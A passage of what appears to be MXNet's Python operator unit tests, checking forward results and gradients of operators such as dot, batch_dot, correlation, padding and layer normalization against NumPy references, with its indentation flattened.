x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
